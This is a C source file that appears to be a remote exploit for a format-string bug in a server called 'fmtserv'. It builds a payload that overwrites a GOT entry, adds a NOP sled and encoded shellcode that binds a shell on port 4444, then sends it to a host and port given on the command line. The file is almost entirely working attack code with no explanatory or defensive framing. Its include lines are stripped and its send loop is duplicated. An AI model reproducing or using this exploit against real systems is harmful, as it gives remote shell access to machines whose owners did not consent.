#include #include #include #include #define GOTADDR 0x0804a030 //snprintf() --> objdump -R fmtserv #define RETADDR 0x41414141 // return address to hit nop slide + shellcode #define OFFSET 4 #define SIZE 1024 char shellcode[] = /*Portbind @ 4444*/ "\x33\xc9\xb1\x17\xdb\xdf\xd9\x74\x24\xf4\xbb\xeb\xfe\xc9" "\xcd\x5a\x31\x5a\x16\x03\x5a\x16\x83\xc2\x04\xe2\x1e\xcf" "\x12\x9e\xa3\x63\xcf\x2b\xaa\x65\x65\x4a\xf4\xa8\xfa\x04" "\x9d\x61\xa9\x7a\xcf\xd7\x1f\x1d\x87\xc6\xc3\x87\x3f\xe3" "\xfb\xce\x5e\x99\xe7\x81\xf6\xd7\xf9\x61\x9c\x81\xa1\xa8" "\xe0\xfe\x34\x80\xe4\x33\x38\xb4\xb6\x9d\xb0\xd8\x75\x92" "\xa5\xd7\xf9\x41\x70\x82\xc6\x3d\x4e\xd2\x71\xc7\xa8\xbb" "\xae\x18\x3a\x54\xd8\x49\xde\xcd\x76\x1f\xfd\x5e\xd5\x96" "\xe3\xef\xd2\x65\x63\x05"; int main(int argc, char *argv[]) { if(argc < 3) { printf("Usage: %s host port\n", argv[0]); return 0; } char buffer[SIZE], *host = argv[1], *got[3] = {((char *)GOTADDR + 2),((char *)GOTADDR),}; int i, high, low, len; int n, s, c, retval, addrlen; struct addrinfo Hints, *AddrInfo, *AI; high = (RETADDR & 0xffff0000) >> 16; low = (RETADDR & 0x0000ffff); high -= 0x8; sprintf(buffer, "%s%%.%dx%%%d$hn%%.%dx%%%d$hn", &got, high, OFFSET,(low - high) - 0x8, OFFSET + 1); memset(buffer + strlen(buffer), '\x90', 512); sprintf(buffer + strlen(buffer), "%s\r\n", shellcode); len = strlen(buffer); memset(&Hints,0,sizeof(Hints)); Hints.ai_family = AF_UNSPEC; Hints.ai_socktype = SOCK_STREAM; retval = getaddrinfo(argv[1],argv[2], &Hints, &AddrInfo); if(retval!=0){ printf("Cannot resolve requested address\n"); exit(0); } for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){ printf("can't create socket\n"); exit(0); } connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); } for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){ printf("can't create socket\n"); exit(0); } connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); } freeaddrinfo(AddrInfo); return 0; }